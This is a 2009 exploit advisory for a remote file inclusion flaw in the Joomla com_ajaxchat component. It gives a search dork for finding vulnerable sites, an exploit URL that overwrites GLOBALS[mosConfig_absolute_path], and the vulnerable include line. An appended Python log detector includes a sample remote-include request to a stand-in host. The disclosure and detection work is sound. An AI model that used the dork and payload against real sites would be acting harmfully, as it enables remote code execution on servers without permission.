Joomla Component com_ajaxchat Remote File Include vulnerability

2009.10.28
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#############################################################################
## Joomla Component com_ajaxchat Remote File Include vulnerability
## Author   : kaMtiEz (kamzcrew@gmail.com)
## Homepage : http://www.indonesiancoder.com
## Date     : September 27, 2009
#############################################################################
## -=- INDONESIAN CODER -=- KILL-9 CREW -=-
#############################################################################

[ Software Information ]

[+] Vendor : http://www.fijiwebdesign.com/
[+] Download : http://www.fijiwebdesign.com/
[+] Version : 1.0 -
[+] Vulnerability : RFI
[+] Price : $49.95
[+] Dork : inurl:"com_ajaxchat"
[+] Location : INDONESIA

#############################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]

[ BUG IN ]

ajcuser.php, error in line 7:

    // include our comprofiler class
    require_once($GLOBALS['mosConfig_absolute_path'].'/components/com_ajaxchat/plugins/plugin.user.php');

The include path is built from $GLOBALS['mosConfig_absolute_path'], which the request above supplies as a parameter.

[ FIX ]

Tukulesto said : ask Aurakasih .. lol
kaMtiEz said : ask AuraKasih .. haha
M3Nw5 said : ask AuraKasih .. haha
Arianom said : try asking aura kasih, bro

Joke.. ;)

#############################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ]

[+] thanks to dad and mom .... muach ..
[+] thanks to uncle tukulesto, who always keeps me company and never gets bored of me .. hahaha
[+] crazy, 20 hours teamed up with tukulesto and finally there is a result ^_^
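
Added example (not part of the original advisory and not code from the component's vendor): a log check that flags requests carrying the GLOBALS[mosConfig_absolute_path] parameter described under [ Vulnerable File ], including its percent-encoded form, and direct hits on tests/ajcuser.php. The combined log format, the verdict names, the client addresses and the example.invalid host are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request field of an Apache/nginx combined-format access log line.
LOG_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Parameter names that write into PHP's $GLOBALS or set the Joomla path variable.
PARAM_RE = re.compile(r'^(GLOBALS\[.*\]|mosConfig_absolute_path)$', re.I)
# A value starting with a URL scheme points the include at another host.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)
VULN_PATH = "/components/com_ajaxchat/tests/ajcuser.php"

# Constructed sample lines (documentation addresses, example.invalid host).
_TS = "[28/Oct/2009:10:00:00 +0100]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_TS} "GET {VULN_PATH}?GLOBALS[mosConfig_absolute_path]='
    f'http://example.invalid/x.txt? HTTP/1.1" 200 512',
    f'203.0.113.7 - - {_TS} "GET {VULN_PATH}?GLOBALS%5BmosConfig_absolute_path%5D=test'
    f' HTTP/1.1" 500 0',
    f'198.51.100.4 - - {_TS} "GET {VULN_PATH} HTTP/1.1" 200 12',
    f'198.51.100.9 - - {_TS} "GET /index.php?option=com_ajaxchat&Itemid=5 HTTP/1.1" 200 9000',
]

def classify(line):
    """Return (client, status, verdict) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    verdict = None
    # parse_qsl percent-decodes, so GLOBALS%5B...%5D is seen as GLOBALS[...].
    for name, value in parse_qsl(query, keep_blank_values=True):
        if PARAM_RE.match(name):
            if SCHEME_RE.match(value):
                verdict = "remote-include-attempt"
                break
            verdict = "globals-overwrite"
    if verdict is None and unquote(path).lower().endswith(VULN_PATH):
        verdict = "direct-test-script-access"
    return (m["client"], int(m["status"]), verdict) if verdict else None

def scan(lines):
    """Classify every line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for client, status, verdict in scan(SAMPLE_LOG):
        print(f"{client} status={status} {verdict}")
```

Access logs record only the query string, so a parameter sent in a POST body is not visible to this check.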

